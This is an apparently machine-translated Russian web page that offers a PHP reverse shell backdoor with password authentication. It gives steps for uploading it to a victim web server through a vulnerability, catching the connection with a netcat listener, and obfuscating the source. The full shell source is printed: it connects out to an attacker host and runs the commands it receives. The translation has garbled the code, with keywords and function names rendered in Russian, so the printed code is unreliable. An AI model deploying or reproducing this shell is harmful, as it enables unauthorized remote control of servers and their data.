Обратные Shell v1.0 PHP – Функция проверки подлинности
Продукта:
Ашфак Ансари
Версия:
1.0
Цена:
Бесплатно

Пересмотрены:
Рейтинг:
5
На Октябрь 9, 2012
Последние изменения:Январь 18, 2013

Резюме:

Реверс Connect PHP Shell с встроенной функцией аутентификации. Высокий сценарий, чтобы защитить ваш черный ход.

Введение

 

Этот инструмент предназначен для пентеста ситуации, когда вы должны загружать доступ к веб-сервер под управлением PHP.
Загрузить этот сценарий, чтобы где-то в веб-корень, то запустить его, обращаясь к соответствующим URL в вашем браузере. Сценарий откроет исходящего соединения TCP от веб-сервера на хост и порт определен в сценарии. Предел к этой связи TCP будет оболочки.
 

Это будет надлежащего интерактивной оболочки, в котором вы можете запускать программы, как interective Telnet и SSH.
Эта оболочка имеет встроенную функцию аутентификации, которая предотвращает чужой злоупотреблять вашей бэкдор.
Она отличается от веб-форму на основе оболочку, которая позволит вам отправить одну команду, затем вернуть вам выходных.
 

Изменение исходного

 

1
2
3
$IP = "127.0.0.1"; #Замените это значение Публичный IP-адрес
$порт = 4444;      #Замените это значение порта
$пароль = base64_decode("aGFja3N5c3RlYW0="); #Пароль по умолчанию: hacksysteam (MD5)

 

Измените значения в соответствии с вашими потребностями и ситуацией.
 

Затемнение Источник

 

Как только Вы сделали модификации, Вы можете использовать любую онлайн PHP Obfuscator для кодирования сценарий PHP.
 

Пример: http://www.codeeclipse.com/
 

Перед обфускации, пожалуйста, измените выше значения в соответствии с вашими потребностями.
 

Слушатель установки Netcat

 

Начать Netcat слушателя на хост и порт, который будет доступен на веб-сервере.
Используйте тот же порт здесь, как было указано в обратном скрипт например (4444):
 

1
Root @ BT:~ # Северная Каролина -lvvp 4444

 

Загрузить скрипт и выполнить его

 

Используя уязвимость обнаружена вами на веб-сайте, загружать reverse_shell.php.
Запустите сценарий просто перейдя по ссылке на вновь загруженный файл в веб-браузере.
 

1
HTTP://<Жертва IP>/<Путь выгрузки>/reverse_shell.php

 

Внимание: Вы не будете видеть никаких на веб-странице, она продолжится в режиме ожидания, если его успешной.
 

Лут с вашей оболочки

 

Исходный код

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?PHP
###################################################
#               Обратный Shell v1.0 #
#             Функции аутентификации #
#                                                 #
#            Hacksys команды - Panthera #
#             Автор: Ашфак Ансари #
#            hacksysteam@hotmail.com #
#          HTTP://hacksys.vfreaks.com #
#              Предназначен для Linux #
#             Благодаря lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$Версия = "1.0";
$IP = "127.0.0.1"; #Измените это
$порт = 4444;      #Измените это
$пароль = base64_decode(&quot;aGFja3N5c3RlYW0="); #Пароль по умолчанию: hacksysteam (MD5)

$баннер = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Обратный Shell в PHP
    Автор: Ашфак Ансари
   hacksysteam@hotmail.com
 HTTP://hacksys.vfreaks.com /\N\N"
);

$PWD = shell_exec("PWD");
$SysInfo = shell_exec("UNAME-");
$ID = shell_exec(Id | сократить-Д "(" -фа 2 | сократить-Д ")" -е 1 ');
$дата = shell_exec("Дата");
$только = 1337;
$информация =
("
Информационная система:\N$SysInfo
Текущий рабочий каталог: $PWD
Группа пользователей: $ID
Текущие дата и время: $дата\N
"
);

печатать "\NПытается подключиться к: $IP на порту $порт ...\N\N";

$sockfd = fsockopen($IP , $порт , $ERRNO, $errstr );

если($ERRNO != 0)
  {
    печатать "\N****** Произошла ошибка ******\NОшибка Nnumber: $ERRNO\NСтрока ошибки: $errstr\N\N";
    die(0);
  }
еще если (!$sockfd)
  {
    печатать "Fatal : Неожиданная ошибка произошла при попытке подключения!\N";
  }
еще
  {
    печатать "Подключен к: $IP на порту $порт ...\N\N";
    ЕриЕз ($sockfd , $баннер);
    ЕриЕз($sockfd ,«Введите пароль: ");
    $GETPASS = отделка(ЕдеЬз($sockfd, StrLen($пароль) + 2));

    если ($GETPASS == $пароль)
    {
      ЕриЕз($sockfd, "\NУспешная проверка подлинности..\N");
      ЕриЕз($sockfd, $информация);
      в то время как(!EOF($sockfd))
      {
    $cmdPrompt = отделка($ID) . "@" . отделка($IP) . ":~" . отделка($PWD) . "# ";
    ЕриЕз ($sockfd , $cmdPrompt );
    $команда = отделка(ЕдеЬз($sockfd, $только));
        если (отделка($команда) == "Выход")
    {
      ЕриЕз($sockfd ,"\NОтменена пользователем ... Выход ..." );
      FClose($sockfd);
      die(0);
    }
    ЕриЕз($sockfd , "\N" . shell_exec($команда) . "\N");
      }
      FClose($sockfd);
      die(0);
    }
    еще
    {
      ЕриЕз($sockfd ,"\NНеверный пароль ... Выход ...");
      FClose($sockfd);
      die(0);
    }
  }
?>

 

Скриншот

 


 

Скачать обратного Shell v1.0 PHP – Функция проверки подлинности

 

Reverse_Shell_v1.0.zip

 
 
 

21,008 просмотров всего, 16 просмотров сегодня

Следующие две вкладки изменять содержимое ниже.

Ашфак Ансари

Исследователь безопасности
Ашфак Ансари является основателем HackSys команды кодовым названием "Panthera". Он исследователь безопасности с опытом работы в различных аспектах информационной безопасности. Он является автором "HackSys Экстремальные Уязвимые водителя" и "Shellcode смерти". Он также написал и опубликовал различные технические документы на эксплуатацию программного обеспечения низкого уровня. Его основной интерес заключается в "Низкий уровень эксплуатации", "Обратное проектирование", "Анализ программы" и "Гибридная Фаззинг". Он фанат искусственного интеллекта и машинного обучения. Он глава свинец для нулевой Пуне.

Оставить комментарий

Ваш электронный адрес не будет опубликован. Обязательные поля помечены *